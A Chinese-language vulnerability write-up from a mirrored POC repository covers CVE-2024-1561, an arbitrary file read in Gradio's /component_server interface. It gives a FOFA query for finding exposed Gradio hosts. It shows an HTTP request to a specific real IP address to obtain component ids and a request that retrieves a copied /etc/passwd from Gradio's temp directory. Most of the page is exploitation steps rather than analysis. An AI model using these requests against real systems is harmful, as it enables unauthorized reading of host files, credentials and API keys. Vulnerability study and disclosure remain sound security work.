crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 22:54:51 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

44 lines
2.3 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# python Gradio插件存在任意文件读取漏洞(CVE-2024-1561)
# 一、漏洞简介
Gradio是一个开源的Python库用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域尤其适合于快速原型设计、模型验证、演示和教学。Gradio的/component_server接口不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响可能导致敏感信息如存储在环境变量中的API密钥和凭据的泄露。
# 二、影响版本
+ Gradio
# 三、资产测绘
+ fofa`body="__gradio_mode__"`
![1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b.png](./img/nhqHGDrOPHKgDp7N/1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b-158980.png)
# 四、漏洞复现
首席获取components的id值
```plain
GET /config HTTP/1.1
Host: 101.35.228.120
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
```
![1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24.png](./img/nhqHGDrOPHKgDp7N/1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24-678576.png)
携带id值将/etc/passwd文件的内容写入临时文件
![1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060.png](./img/nhqHGDrOPHKgDp7N/1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060-659510.png)
读取文件
```plain
GET /file=/tmp/gradio/4985ef451ed671433e69560a0edc00761e44efab/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Accept-Encoding: gzip
```
![1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a.png](./img/nhqHGDrOPHKgDp7N/1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a-950250.png)
> 更新: 2024-09-05 23:27:24
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sh67wp3qcrzx75qv>
Reference in New Issue View Git Blame Copy Permalink